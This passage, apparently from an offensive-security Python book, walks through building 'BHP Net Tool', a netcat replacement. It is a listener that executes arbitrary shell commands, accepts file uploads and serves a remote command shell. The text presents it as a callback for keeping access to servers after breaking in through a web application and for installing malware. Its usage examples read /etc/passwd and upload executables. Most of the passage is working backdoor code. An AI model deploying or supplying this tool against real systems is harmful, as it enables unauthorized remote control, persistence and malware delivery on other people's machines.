Replacing Netcat
Netcat is the utility knife of networking, so it’s no surprise that shrewd systems administrators remove
it from their systems. On more than one occasion, I’ve run into servers that do not have netcat
installed but do have Python. In these cases, it’s useful to create a simple network client and server
that you can use to push files, or to have a listener that gives you command-line access. If you’ve
broken in through a web application, it is definitely worth dropping a Python callback to give you
secondary access without having to first burn one of your trojans or backdoors. Creating a tool like
this is also a great Python exercise, so let’s get started.
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
Here, we are just importing all of our necessary libraries and setting some global variables. No
heavy lifting quite yet.
Now let’s create our main function responsible for handling command-line arguments and calling the
rest of our functions.
➊ def usage():
print "BHP Net Tool"
print
print "Usage: bhpnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for
incoming connections"
print "-e --execute=file_to_run - execute the given file upon
receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a
file and write to [destination]"
print
print
print "Examples: "
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
➋ try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",
["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin?
➌ if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
➍ server_loop()
main()
We begin by reading in all of the command-line options ➋ and setting the necessary variables
depending on the options we detect. If any of the command-line parameters don’t match our criteria,
we print out useful usage information ➊. In the next block of code ➌, we are trying to mimic netcat
to read data from stdin and send it across the network. As noted, if you plan on sending data
interactively, you need to send a
CTRL
-D to bypass the stdin read. The final piece ➍ is where we
detect that we are to set up a listening socket and process further commands (upload a file, execute a
command, start a command shell).
Now let’s start putting in the plumbing for some of these features, starting with our client code. Add
the following code above our
main
function.
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))
➊ if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
➋ while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
# wait for more input
➌ buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
# tear down the connection
client.close()
Most of this code should look familiar to you by now. We start by setting up our TCP socket object
and then test ➊ to see if we have received any input from stdin. If all is well, we ship the data off to
the remote target and receive back data ➋ until there is no more data to receive. We then wait for
further input from the user ➌ and continue sending and receiving data until the user kills the script.
The extra line break is attached specifically to our user input so that our client will be compatible
with our command shell. Now we’ll move on and create our primary server loop and a stub function
that will handle both our command execution and our full command shell.
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,
args=(client_socket,))
client_thread.start()
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
➊ output = subprocess.check_output(command,stderr=subprocess.
STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
By now, you’re an old hand at creating TCP servers complete with threading, so I won’t dive in to the
server_loop
function. The
run_command
function, however, contains a new library we haven’t
covered yet: the
subprocess
library.
subprocess
provides a powerful process-creation interface
that gives you a number of ways to start and interact with client programs. In this case ➊, we’re
simply running whatever command we pass in, running it on the local operating system, and returning
the output from the command back to the client that is connected to us. The exception-handling code
will catch generic errors and return back a message letting you know that the command failed.
Now let’s implement the logic to do file uploads, command execution, and our shell.
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
➊ if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
➋ while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
➌ try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to
%s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" %
upload_destination)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
➍ if command:
while True:
# show a simple prompt
client_socket.send(" ")
# now we receive until we see a linefeed
(enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
Our first chunk of code ➊ is responsible for determining whether our network tool is set to receive a
file when it receives a connection. This can be useful for upload-and-execute exercises or for
installing malware and having the malware remove our Python callback. First we receive the file data
in a loop ➋ to make sure we receive it all, and then we simply open a file handle and write out the
contents of the file. The
wb
flag ensures that we are writing the file with binary mode enabled, which
ensures that uploading and writing a binary executable will be successful. Next we process our
execute functionality ➌, which calls our previously written
run_command
function and simply sends
the result back across the network. Our last bit of code handles our command shell ➍; it continues to
execute commands as we send them in and sends back the output. You’ll notice that it is scanning for a
newline character to determine when to process a command, which makes it netcat-friendly.
However, if you are conjuring up a Python client to speak to it, remember to add the newline
character.
|